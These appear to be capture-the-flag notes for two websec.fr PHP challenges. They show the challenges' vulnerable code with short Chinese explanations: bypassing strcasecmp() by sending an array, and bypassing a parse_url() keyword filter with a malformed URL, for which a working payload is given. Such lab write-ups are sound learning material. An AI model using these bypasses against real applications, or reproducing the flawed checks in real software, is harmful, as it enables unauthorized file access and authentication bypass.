level17

<?php
include "flag.php";

function sleep_rand() { /* I wish php5 had random_int() */
        $range = 100000;
        $bytes = (int) (log($range, 2) / 8) + 1;
        do {  /* Side effect: more random cpu cycles wasted ;) */
            $rnd = hexdec(bin2hex(openssl_random_pseudo_bytes($bytes)));
        } while ($rnd >= $range);
        usleep($rnd);
}
?>
<?php
    if (! strcasecmp ($_POST['flag'], $flag))
        echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';   
    else
        echo '<div class="alert alert-danger">Invalid flag, sorry.</div>';
?>

php strcmp() strcasecmp() 函数当传入数组时会某些php版本返回0

level25

<?php
if (!isset($_GET['page'])) {
  header('Location: http://websec.fr/level25/index.php?page=main');
  die();
}
?>
<?php
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}

include $_GET['page'] . '.txt';
?>

parse_url
对严重不合格的 URL，parse_url() 可能会返回 false

http://websec.fr///level25///index.php?page=flag